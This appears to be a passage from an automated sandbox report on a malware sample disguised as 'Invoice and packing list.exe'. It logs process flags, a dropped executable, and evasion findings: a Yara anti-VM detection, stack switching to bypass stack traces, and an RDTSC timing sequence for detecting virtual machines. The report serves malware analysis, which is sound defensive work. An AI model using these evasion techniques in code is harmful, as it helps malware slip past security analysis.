Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Invoice and packing list.exe PID: 4424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: utlAHqvw.exe PID: 1856, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
